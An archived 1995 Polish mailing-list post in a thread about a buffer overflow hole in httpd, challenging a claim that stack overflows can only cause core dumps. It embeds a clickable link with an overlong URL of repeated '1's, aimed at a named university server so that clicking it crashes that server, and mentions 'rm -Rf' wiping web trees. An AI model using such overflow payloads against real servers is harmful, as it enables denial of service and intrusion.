Eksperyment (was Re: Niebezpieczna dziura w httpd)

Autor: A.Gorbiel (mkaleta_at_cyf-kr.edu.pl)
Data: Tue 28 Feb 1995 - 00:27:40 MET


Krzysztof Mlynarski (krzysio_at_hebe.umcs.lublin.pl) wrote:

: 1. Podkladanie losowych danych na stos moze najwyzej wygenerowac core'a.
                                              ^^^^^^^^?

Pelen podziwu dla pewnosci siebie Krzysztofa Mlynarskiego, proponuje maly
eksperyment dla tych, co POLIP czytaja _Netscapem_. Mam nadzieje, ze NTTP
nie obetnie mi tej przydlugawej linii (oryginalnie 393 znaki, dowolne).

<A HREF="http://hebe.umcs.lublin.pl/111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111">
Klinknij tu, zeby zwalic core na hebe UMCS ;-)</A>

: Np. moj httpd chodzi, jako user: nobody w grupie: guests. Uzytkownik ten ma
: jako shell /dev/null, a zadne pliki w sytemie nie sa przez niego
: modyfikowalne oprocz logow httpd wlasnie.

A tak powaznie, czy administratorzy pozostalych 56 (!) polskich serwerow WWW
rownie dobrze, jak krzysio_at_hebe, zabezpieczyli sie przed proba wlamania.
Czy tez np. potencjalne 'rm -Rf' zlikwiduje im cenne hipertekstowe drzewko?

Andrzej

-- ,
Andrzej Gorbiel <A.Gorbiel_at_Ga-Wyb.Krakow.PL>
(...) [ wycialem, zeby nikogo nie draznic ;-) ]



To archiwum zostało wygenerowane przez hypermail 2.1.7 : Wed 19 May 2004 - 15:49:56 MET DST